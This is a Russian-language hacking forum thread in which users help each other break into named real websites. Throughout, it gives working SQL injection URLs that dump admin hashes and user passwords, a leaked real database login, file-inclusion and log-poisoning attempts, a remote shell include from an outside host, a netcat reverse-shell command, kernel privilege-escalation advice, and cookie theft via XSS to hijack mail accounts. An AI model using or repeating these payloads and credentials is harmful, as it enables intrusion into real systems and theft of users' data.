Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclientС этого ничего. Что за инфо.пхп?

С этого ничего. Что за инфо.пхп?

http://gcmpp.ru/info.php

а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5

а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
Дальше только перебор ибо 4 ветка без доступа к mysql и как правило file_priv в N:
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(concat_ws(0x3A,u ser(),@@version,database())))

а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5


http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(version()))-- почему в unhex(hex(version()))? Потому что, когда мы ставим просто version() вылетает ошибка. Будем кодировать) Версия 4, т.е. таблицы через information_schema найти не получится =( Проверим file_priv, стандартные таблицы... Ничего не нашел =( Даже побрутил и ничего не вышло( Но зато это агенство всем наклепало свои уязвимые движки =) Смотрит сайты тут: http://www.web-sites.kiev.ua/portfolio.php Ошибки тут: index.php?act=goods&id=7'&gid=11
index.php?act=page&p=2'

Если найти таблицы, то можно писать сплоит)



P.S: А я вот решил глянуть мой именно домен) http://tigger.com/inspirations/install.php?error=true - вот итог =) Хм... Я так понимаю, что это /install/ но почему-то дальше не хочет =( может есть вариант какой-нибудь)?

Radiator, сплоит ищи под ядро.

сегодня столкнулся с такой проблемой:

через group by определил кол колонок...

а когда уже пишут +union+select.....
слово union заменяется на "тра та та"
как эту хрень обойти?

попробуй регистр букв менять, например UniOn UNiON, а если там нормальная фильтрация, то болт и тебе придётся использовать блайнд-скул.

Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.

Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
http://mysql.infobox.ru/ - вот лови адрес:)

сегодня столкнулся с такой проблемой:

через group by определил кол колонок...

а когда уже пишут +union+select.....
слово union заменяется на "тра та та"
как эту хрень обойти?

Если я правильно понял,то там вхождение слова UNION заменяется на "тра та та" попробуй сделать так uniUNIONon ну с регистрами букв можно поэкспериментировать .... по идее должно получится,он вырежет первое вхождение ... а второе должен оставить ... если что сильно меня не бить

Ни одного под эту версию не увидел! Я гуглил по этому запросу, ничего толком не обнаружил, поэтому и спрашивал, необходим сплоит именно под версию Linux 2.6.28, или можно и 2.6.x ????
Так ничего и не вывалилось... =(
И ещё вопрос, забиндил, подконнектился неткатом, проверяю >
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?
это новое ядро - ничего ты не сделаешь
если ты сделаешь uname -a
то увидишь, что дата ядра позже февраля 2008
а это тухлая дата
если нет возможности скомпелировать на этой машине сплойт - можно на другой linux'овой машине. Да и в винде можно - лишь бы все библиотеки были. Есть такой компилятор lccwin32. им можно попробовать. Потом заливаешь бинарник и исполняешь.
Компилировать нужно на такой же машине с тем же ядром и желательно с той же конфой в плане проца. А в идеале - все должно быть таким же.
Дата эксплоита должна быть раньше даты ядра.

Установил денвер. Его я вижу, http://localhost...

Другие вводя мой айпи не видят.
ПС, брандмаур вырублен, ип не лан, не меняется. С другими типо xampp видят мну. Помогите !

http://www.denwer.ru/faq/shared.html

http://www.metropolis.ru//ru/vacancies-interregional?action=search&total=checkbox&aSpec=4
уязвимый парамет вроде как aSpec... но БД стоит непонятная и вывод тоже....вобщем помогите раскрутить

Только пути.

Возможно раскрутить?
Warning: preg_match() [function.preg-match]: Unknown modifier ')' in /home/***/index.php on line 1974

Возможно раскрутить?
Warning: preg_match() [function.preg-match]: Unknown modifier ')' in /home/***/index.php on line 1974
ну кроме раскрытия путей я ничего не вижу, трудно о чем то суди без линка, может просто кривой программер в patern вставил ) что то типа - "#<title>(.*)</title>#i)"

http://dnsstuff.fastnext.ru/index.php?fDNSTiming=&sDNSTiming=/

http://dnsstuff.fastnext.ru/index.php?fDNSTiming=&sDNSTiming=/
только путь

http://www.oldnewrock.ru/index.php?cont=history&pg=2007-onw&prt=rocktour%27
а тут возможно что то сделать?
Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36

Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36

Warning: main(): Failed opening 'history/2007-onw/inc_rocktour\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36

http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27

Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66


http://www.big-home.ru/card.php?id=10'&type=2
даже не пытался :)

Народ, подскажите что за хеш??
c2lkPTIzNTM2JmdpZD0yODMzMA==
Или каким алгоритмом зашифрованно?

===========

Вопрос закрыт, это base64... туплю

http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27

Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66

Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66




Есть локальный инклуд и SQL-inj

http://www.smsprogroup.ru/news.php?detale=-5%20UNION%20SELECT+1,2,3,4+from+news/*

http://www.smsprogroup.ru/static_page.php?sp=sms/../../../../../../../../www/smsprogr/www/htdocs/index

http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7� �нион почему-то не читает, почему?

Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка?

http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
Тут вывода нету. Если минус поставить - пишет Unable to open image. Опять же не надо о блиндах :) Хочется юнионом вывести, а не посимвольно брутить.

ЗЫ: Если нельзья юнионом - так и скажите =)

http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7
Груп бай говорит 7.
http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7� �нион почему-то не читает, почему?

Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка?


там юниона нету, т к 3 ветка.

http://www.4-dsecurity.com/event.detail.php?EID=6+and+substring(version(),1,1 )=3/*


http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

тут 4 ветка, вывод нашёл, смотри пм =)

http://www.texascitychamber.com/events/detail.php?EID=1+and+substring(version(),1,1)=4/*

В код смотри
http://www.texascitychamber.com/events/detail.php?EID=11111+union+select+version(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25
4.1.22-standard

Есть иньекция, данные передаются постом
_____________________________________________
POST http://www.agilebio.com:80/products_labcal_download.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.agilebio.com
Content-Length: 84
Cookie: PHPSESSID=aeghec9708or5shhuv04kufu11
Connection: Close
Pragma: no-cache

user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*user_pass=&Submit=Download%21&action=download
_____________________________________________

Подобрал поля, но вывода не вижу, он тут есть?

З.Ы. А get тоже работает вроде

http://www.agilebio.com/products_labcal_download.php?user_id='+union+selec t+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&user_pass=&Submit=Download%21&action=download

Наверное не могу поставить в id ошибочный параметр?
Пробовал с лимитом (+LIMIT+1,1/*) то же самое.

Imperou$, гетом тоже можно

мор1ров

http://www.agilebio.com/products_labcal_download.php?user_id='+and+if(asci i(substring((select+concat_ws(0x2F,name,password)+ from+mysql.user+limit+0,1),1,1))>1,1,(select+1+union+select+3))=1/*&user_pass=&Submit=Download&action=download

http://www.ukrlib.com.ua/kratko-zl/printzip.php?id=77{вылазит ошибка}&bookid=5{Тут тоже инъекция но без явной ошибки}

ПОмогите правильно оборвать запрос а то вроде все перепробовал (#,{,/*,--,'#,'{,'/*,--,--+,'--+)

Byrger,

Warning: file(data/.dat) [function.file]: failed to open stream: No such file or directory in /home/ukrlib/domains/ukrlib.com.ua/public_html/kratko-zl/printzip.php on line 24

ошибка с mysql не связана.

вот, наткнулся на это

http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2

Unknown column 'Status' in 'field list'

А если делать запросы следующих видов:


http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--


http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3


http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1


Выдает:The used SELECT statements have a different number of columns


Не первый раз такое встречается, кто-нить знает, как это раскрутить?

ПаВлУшКа,

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat _ws(0x2F,username,password)+from+admin+limit+0,1), 3,1))>1

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
4
А в его запросе-Просто пробелы убери.

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

Вытягивай имя:

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1
5 Символов, скорей всего admin

пасс:

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+passwo rd+from+admin+limit+0,1),32,1))%3E1

32 симола - хэш

ПаВлУшКа
admin:3271d6889498c22a81b51aba93dc9307

ph1l1ster, а как ты хеш узнал? Я правильно понял:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1

Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??

ПаВлУшКа
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),1,1))=97
первый символ ascii: 97 char: a

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),2,1))=100
второй символ ascii: 100 char:d

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),3,1))=109
третий символ ascii: 109 char: m

и тд.

_http://top.warlib.ru/index.php?cid=1'/*

так же здесь есть инклуд:
_http://www.warlib.ru/index.php?id[]=000117

Раскручивание на замену нулл-байту ничего не дало, может у кого получится)

http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5
HIVER, пятая ветка.

подскажите как действовать при имении веб шелла на win server, IIS, asp и php.
есть ли хорошие веб шелы на asp (многофукциональный). есть ли возможность повысить права через asp скрипты? заранее благодарен

https://forum.antichat.ru/nextoldesttothread103565.html
https://forum.antichat.net/nextoldesttothread93095.html

Такой вопрос:
Значит нашол я посивную XSS на одном форуме с помощью вот этого скрипта: "><script>alert(1)</script>. Находится XSS в строке "Заголовок письма" (при написании письма другому пользователю). Ни как не могу въехать как дать жертве ссылку на эту строку, чтобы своровать КУКУ.

Такой вопрос:
Значит нашол я посивную XSS на одном форуме с помощью вот этого скрипта: "><script>alert(1)</script>. Находится XSS в строке "Заголовок письма" (при написании письма другому пользователю). Ни как не могу въехать как дать жертве ссылку на эту строку, чтобы своровать КУКУ.

составить Post Запрос с сылкой на сниф

Т.е. процес тот же, что и с почтовыми сайтами ?
Тут вопрос ещё в чём, я не пойму как дать ссылку не посредственно на эту XSS. Потому что когда я даю ссылку на ту страницу где находится форма письма, XSS так не прокатывает.

Если я не ошибаюсь, это активка.

Такой вопрос:
Значит нашол я посивную XSS на одном форуме с помощью вот этого скрипта: "><script>alert(1)</script>. Находится XSS в строке "Заголовок письма" (при написании письма другому пользователю). Ни как не могу въехать как дать жертве ссылку на эту строку, чтобы своровать КУКУ.
Если я тебя правильно понял то уязвимый параметр Заголовок письма и это письмо отсылаеться другому пользователю с уже внедреным html тегом и у пользователя к которому пишешь вылетает алерт при чтении письма? То это активка, делай просто картинку на сниф с куками.

вылетает алерт при чтении письма? То это активка, делай просто картинку на сниф с куками.

он вроде писал при отправке письма.

Seshh, при отправке или при получении?

При отправке письма, если вносим скрипт в строку "Заголовок письма" и пытаемся отправить.
Загвоздка заключается ещё в следующем, если я вношу скрипт в эту строку, а в строку "имя получателя" ввожу не правильное имя (т.е. имя которого нет на форуме) то скрипт выполняется. Если же имя правильное то скрипт не выполняется, а просто отправляется.

помогите повысить права на win server.

Microsoft-IIS/6.0 servet

имеется вебшелл - asp
cmd команды выполнять не могу

могу запускать php asp perl скрипты. может есть в самом php уязвимости если он на винде, либо asp. какие есть варианты?
подскажите где можно почитать когда такая ситуация. спс

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?

ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте:


http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html


вернее можно, элементарно, но так:


http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html


т.е. как бы вслепую

ПОмогите админку найти
http://www.rustrana.ru/

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
Чисто таблички user нету,

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,group_concat(con cat(table_schema,0x2E,table_name)+separator+0x3c62 723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATI ON_SCHEMA.TABLES+where+table_schema+not+in+(0x696e 666f726d6174696f6e5f736368656d61)+and+table_name+L IKE+0x257573657225.html

karabas_svalka2.t_users
karabas_svalka2.t_users_activate

karabas_svalka2.t_users(в t_users_activate такие же колумны):

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,group_concat(COL UMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,3 1,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+t able_name='t_users'.html


id
email
passwd
user_type
creation_date
comment
name
phone
icq
id_city
id_country
bday
bmonth
byear
sex
id_prefix


ну не вижу в чем проблема вытаскивай например вот так с них:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x 3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28, 29,30,31,32,33,34+from+karabas_svalka2.t_users.htm l


2Byrger
Читалка файлов(как мило с их стороны :))

http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,1 2,13,14,15--+


Реквизиты конекта MySQL:
USER:dbu_ansimov_1
PASS:BFzHAHAMz1K

Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/

Люди,подскажите пожалуйста, как получить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.

чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME
и у тебя название и пароль учётки должен быть такой же как у того админа...

Люди,подскажите подвлуйста, как полоучить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.
теперь проверь эти порты хspider'om на уязвимости

http://wow.homeline.kg/test/?apage=guilds&guid=102'
что тут можно сделать ? можно шелл залить ?

http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5
5-я ветка.

http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1
1 колонка без вывода.

http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+fro m+mysql.user+limit+0,1),1,1))=89
file_priv=Y.

Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)

Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)

Просто не нужно торопиться

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Data base(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43--+

http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F74 2E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43--+

И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера

Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57
________________________________
added
Ещё вопросец.
Вытянул из джумлы админский пасс в хеше
Такого вида
(id,username,password)
62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNC slakgoAAuq55wasFVX8zGRYkIa
Солёный? Или?

Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то

чо тако ??

Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57

фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)

Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!

Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?

Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?
с чего ты взял что там php injection?

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
не факт
не обязательно если выходит ошибка при "page=blalbabla" то есть php injection

фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)
Как это-забиндить под бэкконнект? Если я смогу забиндить-то нах мне бэкконнект?
Просто мне нужно узнать, как например поставить бэкконнект не на мой ип, а на левую тачку, к которой у меня есть доступ (скажем так), или подобный вариант, т.к. я сижу за натом, как оказалось.

биндишь порт - не факт что приконектишься
для бекконекта неткатом
nc -v www.adres_deda.com -e /bin/sh &
на деде nc -l -p
помоему так

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет? Что за ошибка то?

Есть php-иньекция.
пытаюсь записать в http-access.log строчку <?php 'phpinfo';?> через refererr
Записалось успешно. Но ничего не отображает.
Если открыть исходник страницы, вылезет та самая строчка.
ОСь -freebsd 6.2

В чем проблема?

Есть php-иньекция.
пытаюсь записать в http-access.log строчку <?php 'phpinfo';?> через refererr
Записалось успешно. Но ничего не отображает.
Если открыть исходник страницы, вылезет та самая строчка.
ОСь -freebsd 6.2

В чем проблема?

если я не ошибаюсь, phpinfo надо без кавычек писать

Есть php-иньекция.
пытаюсь записать в http-access.log строчку <?php 'phpinfo';?> через refererr
Записалось успешно. Но ничего не отображает.
Если открыть исходник страницы, вылезет та самая строчка.
ОСь -freebsd 6.2

В чем проблема?
<?php phpinfo()?>
МБ?

Вбил <?php phpinfo()?> - тоже самое
Host:***
User-Agent: <?
phpinfo();
?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <?php phpinfo()?>
В логах:
7******** - - [25/Mar/2009:20:10:09 +0300] "GET /smi4.shtml HTTP/1.1" 404 224 "" "

GET host <?php phpinfo() ?>

error_log

попробовал.
Написал:
Wed Mar 25 20:24:20 2009] [error] [client ] script '/home//htdocs/index.php' not found or unable to stat

Инклудь тогда аццесс лог, но что то мне кажется что там у тебя не инклуд а читалка

Таки да, читать файлы я могу.
Там есть чат на файловой БД, внес туда строчку <?php echo 'hello'; ?>(для теста) - попробовал проинклудить - тот же результат.
То ли система, то ли еще что-то на корню режет php строки.

То ли система, то ли еще что-то на корню режет php строки.
Как верно подметил .Slip это скорее всего читалка файлов(то есть файлы не include а например fopen,file_get_contents и т.п. и выводяться в браузер), и ничего не режеться(ну и strip_tags там вот в добавок и теги не видешь с пхп).

added
Ещё вопросец.
Вытянул из джумлы админский пасс в хеше
Такого вида
(id,username,password)
62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNC slakgoAAuq55wasFVX8zGRYkIa
Солёный? Или?
coлёный md5($pass.$salt)
Z1RKNCslakgoAAuq55wasFVX8zGRYkIa - соль

Нашёл блинд инж, подобрал поля

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--

так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(

Нашёл блинд инж, подобрал поля

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--

так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
А почему ты решил что это вообще MySQL?.

http://fineart.sk/index.php?cat=-1+group+by+7--
сможет кто раскрутить? сам пробовал, не удалось даже версию узнать -/

А почему ты решил что это вообще MySQL?.
А почему ты спрашиваешь?Посты набиваешь?
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--

и

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+3--

и

http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2

Догадайся почему.
З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD

Соответственно блинд,разве нет?

2 Calcutta
режет запятые.. даже слепую не заюзать.

З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD

Ну я бы так не сказал все зависит от настроек сервака, ты забываешь еще и про pgsql

Обнаружил при сниффере параметр на передачу он выглядит так примерно

pay=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1% 82%D1%8C

Как каракули понять такие?

urldecode

А ведь это реально каракули - ООтправить

echo iconv("UTF-8","cp1251",urldecode("%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D 1%8C"));

Ну я бы так не сказал все зависит от настроек сервака, ты забываешь еще и про pgsql
Хорошо, пусть это будет PostgreSQL. =)
Ну помочь то сможешь? Там мускул стоит мне кажется, т.к. 3306 открыт.Или я ошибаюсь и все бд используют этот порт?

Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???

есть, если в куках есть пароль и знать алгоритм шифрования пароля

А ведь это реально каракули -


<?php
$q = 'ООтправить';
$s = mb_detect_encoding($q);//Определяем кодировку
$q = iconv($s, 'CP1251//TRANSLIT', $q);//Декодируем
echo $s . "\r\n";
echo $q . "\r\n";
?>

Ввожу:
.../srt.php?id=-1+union+select+1,2,3--+
Получаю:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LEFT JOIN categories on torrents.category = categories.id LEFT JOIN sub_categori' at line 22

Есть идеи как строится запрос и в каком направлении нужно раскручивать?

когда видишь такое - LEFT JOIN - только слепая скуля, т.к. кол-во колонок не подберешь из-за участия в данном запросе не только одной таблицы.

Либо blind, либо ищи другую ссылку на этом же сайте, где запросы попроще

Со слепыми ещё не сталкивался, но буду пробовать.
(искать другую не вариант, т.к. даже для этой потребовались права модератора)
Есть мыски куда копать?

2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127

2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127
Спасибо, думаю дальше смогу сам раскрутить.

когда видишь такое - LEFT JOIN - только слепая скуля, т.к. кол-во колонок не подберешь из-за участия в данном запросе не только одной таблицы.
заблуждаешься
mysql> SELECT 1,2 FROM mysql.user LEFT JOIN mysql.db ON(1=1) UNION SELECT 3,4;
+---+---+
| 1 | 2 |
+---+---+
| 1 | 2 |
| 3 | 4 |
+---+---+
2 rows in set (0.00 sec)

2 Gray_Wolf

.../srt.php?id=1+AND+(SUBSTRING((select+version()),1,1 ))>33..127

Можно ведь и проще:
.../srt.php?id=1+AND+SUBSTRING(version(),1,1)<5

Прошу извенить если не туда запостил, вот какая проблема :
просмотрел видео на ачате как ломать майл.ру с помощью ксс http://video.antichat.org/file213.html..так вот там при получении кукис нужно подставлять их в оперу.кукис получил через сниф подставил в оперу все как надо.но при заходе на http://win.mail.ru/cgi-bin/start не логиниться а выбрасывает на страницу логаут.на которой в поле логин - логин вставляеться , а пароль нет, на месте пароля пустое окно.Подскажите плз что нужно сделать чтобы попасть в ак?

устарела сессия. Куки просрочены. Или криво в оперу вставил.

устарела сессия. Куки просрочены. Или криво в оперу вставил.
да вы были правы!
только вот теперь встала другая делема:
